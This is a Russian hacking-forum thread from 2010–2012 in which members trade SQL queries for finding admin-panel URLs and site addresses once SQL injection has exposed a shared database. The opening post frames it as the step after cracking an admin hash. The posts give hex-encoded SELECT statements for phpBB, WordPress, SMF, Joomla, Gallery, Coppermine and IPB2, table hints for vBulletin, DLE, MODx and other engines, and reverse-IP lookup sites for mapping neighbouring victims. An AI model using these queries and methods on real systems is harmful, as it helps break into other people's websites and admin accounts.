Раскрытие путей в БД

Discussion in 'Уязвимости' started by HornetBlack, 13 Sep 2010.

  1. HornetBlack

    HornetBlack Member

    Joined:
    28 Oct 2007
    Messages:
    27
    Likes Received:
    13
    Reputations:
    15
    Занимаясь наполнением своего зверька MWG полезной инфой, столкнулся с темой, которая практически нигде еще не освещалась.
    Работая с SQL-инжектами довольно часто натыкаешься на сайты, запущенные под юзером с большими привилегиями, а значит в БД доступны для просмотра десятки табличных схем, относящихся к разным сайтам. После декодирования хэша админа из таблицы какой-нибудь схемы возникает вопрос - как найти админку или хотя бы сайт, к которому относится данная схема? Хотелось бы в этом топике собрать методы поиска путей к таким админкам и сайтам, а также готовые решения для известных форумов и CMS.
    Одним из способов найти искомый путь является поиск подсказок в самой БД. Для некоторых форумов и цмс-ок этот метод наиболее прост. Например, для форума phpBB следующий запрос вернет путь к админке:
    SELECT group_concat(config_value ORDER BY config_name DESC SEPARATOR 0x2F) FROM phpbb_config WHERE config_name=0x7365727665725F6E616D65 OR config_name=0x7363726970745F70617468
    Для Wordpress:
    SELECT concat(option_value,0x2F77702D6C6F67696E2E706870) FROM wp_options WHERE option_name LIKE 0x7369746575726C
    Для SMF:
    SELECT replace(value,0x2F536D696C657973,0x2F696E6465782E7068703F616374696F6E3D6C6F67696E32) FROM smf_settings WHERE variable=0x736D696C6579735F75726C
    А вот у Joomla я обнаружил только абсолютный путь к сайту, который все же иногда помогает найти урл сайта:
    SELECT substring_index(substring_index(substr(data,instr(data,0x50617468)),0x22,3),0x22,-1)

    Более сложным вариантом нахождения нужных сайтов является прогон строк контента из БД в поисковиках. Есть ли еще идеи?
     
    4 people like this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    я вот чекаю например осталные сайты через риверс ип

    в 90% случаев сайты на одном же серваке

    ну и если форум, то через селект просмотриваю например какой нить топик и гуглю.

    или не стандартные имена пользователей )
    ну и в конце концов имя базы тоже много говорит, конечно же не всегда :)
     
    _________________________
    #2 Konqi, 13 Sep 2010
    Last edited: 16 Dec 2015
  3. HornetBlack

    HornetBlack Member

    Joined:
    28 Oct 2007
    Messages:
    27
    Likes Received:
    13
    Reputations:
    15
    А чем пользуешься для реверса? domainsdb.net видимо сдох навсегда, а madnet.name очень часто не возвращает ничего.
    Насчет гугленья, все перечисленные варианты я тоже использую в ручном режиме, но для автоматизации нужна инфа с подсказками из таблиц в популярных движках. В данный момент у меня есть готовые запросы только для phpList, SMF, Wordpress, phpBB, IPB2, myBB.
     
    1 person likes this.
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Это уже очень много, + от меня, если смогу то добавлю )

    для реверса юзаю http://ip-whois.net/site_one_ip.php
     
    _________________________
  5. HornetBlack

    HornetBlack Member

    Joined:
    28 Oct 2007
    Messages:
    27
    Likes Received:
    13
    Reputations:
    15
    Спасибо. Если буду находить новые подсказки в базах, буду выкладывать их тут в виде запросов. В данный момент меня очень интересуют Joomla и Mambo, но пока зацепок к ним нет. Даже абсолютный путь выдергивается из jos_session, а она может отсутствовать или не иметь нужной записи...
     
    1 person likes this.
  6. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    Вот еще пару отличных сервисов

    http://spyonweb.com/
    http://2ip.ru/domain-list-by-ip/
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Раскрытие путей в БД Gallery (http://gallery.menalto.com/)

    SELECT g_location FROM g2_EventLogMap WHERE length(g_location)>0
     
    _________________________
  8. leaderru

    leaderru Member

    Joined:
    19 May 2010
    Messages:
    108
    Likes Received:
    9
    Reputations:
    0
    Еще один классный сайт: http://speed-tester.info/sites_list.php
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    PunBB
    Code:
    online → prev_url = [url]
    Vbulletin
    Code:
    SELECT value FROM setting WHERE varname='site_tab_url'
    это от Ereee
    phpbb3
    Code:
    phpbb_config > config_name = `cookie_domain`, config_value = [url]
    IPB
    Code:
    ibfconf_settings > conf_key = `home_url`, conf_value = [url]
    Datalife Engine
    в конфигах не нашел, но можно посмотреть тут:
    Code:
    dle_email > name = `reg_mail`, template = [url]
    MODx
    урла нет, но возможно найдете здесь:
    Code:
    modx_system_settings > setting_name = `site_name`, setting_value = [title] or setting_name = `filemanager_path`, setting_value = [home_path]
    WebAsyst
    Code:
    SC_settings > settings_constant_name = `CONF_SHOP_URL`, settings_value = [url]
    NetCat
    Code:
    Catalogue > Domain = [url]
     
    _________________________
    #9 yarbabin, 16 Feb 2012
    Last edited: 16 Feb 2012
    Amity, Ereee and Konqi like this.
  10. SecondLife

    SecondLife Elder - Старейшина

    Joined:
    8 May 2011
    Messages:
    30
    Likes Received:
    21
    Reputations:
    21
    Тогда уж server_name. В cookie_domain может находится что угодно, чаще всего - простой слеш.
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Раскрытие путей в Coppermine Photo Gallery

    SELECT value FROM cpg_config WHERE name=0x6563617264735f6d6f72655f7069635f746172676574
     
    _________________________
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    IPB2 (Invision Power Board 2)

    SELECT conf_value FROM ipb_conf_settings WHERE conf_key in (0x75706c6f61645f75726c, 0x75706c6f61645f646972)
     
    _________________________